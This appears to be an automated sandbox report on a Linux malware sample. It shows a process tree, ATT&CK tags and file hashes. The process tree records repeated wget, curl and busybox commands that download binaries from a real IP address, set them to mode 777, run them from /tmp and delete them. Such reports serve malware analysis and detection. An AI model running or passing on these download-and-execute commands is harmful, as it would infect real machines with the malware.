/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1627
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1630
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1633
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1636
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1639
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1644
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1647
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1650
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1653
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1656
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1657
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1659
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1665
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1668
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97